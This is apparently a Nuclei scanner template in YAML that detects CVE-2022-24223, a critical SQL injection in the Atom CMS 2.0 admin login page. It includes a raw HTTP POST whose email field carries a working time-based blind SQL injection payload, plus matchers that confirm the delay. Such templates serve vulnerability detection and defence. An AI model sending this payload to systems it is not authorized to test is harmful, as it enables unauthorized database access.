48 lines
1.5 KiB
YAML
48 lines
1.5 KiB
YAML
id: CVE-2022-24223
|
|
|
|
info:
|
|
name: Atom CMS v2.0 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.
|
|
remediation: Fixed in version Atom CMS v2.1
|
|
reference:
|
|
- https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html
|
|
- https://github.com/thedigicraft/Atom.CMS/issues/255
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-24223
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-24223
|
|
cwe-id: CWE-89
|
|
epss-score: 0.01499
|
|
epss-percentile: 0.85476
|
|
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: thedigitalcraft
|
|
product: atomcms
|
|
tags: packetstorm,cve,cve2022,sqli,atom,cms
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 10s
|
|
POST /admin/login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
email={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 200'
|
|
- 'contains(body, "Admin Login") && contains(body, "Atom.SaveOnBlur")'
|
|
condition: and
|
|
|
|
# digest: 4a0a004730450221008f6c48ec55bc4c772ba7f61ae077af1239691b2228baac37e3030cc04370396202201a47a7b64360080114f34fb369d60d17f7f7827aa6dfbe1ddfc87f8588e81725:922c64590222798bb761d5b6d8e72950
|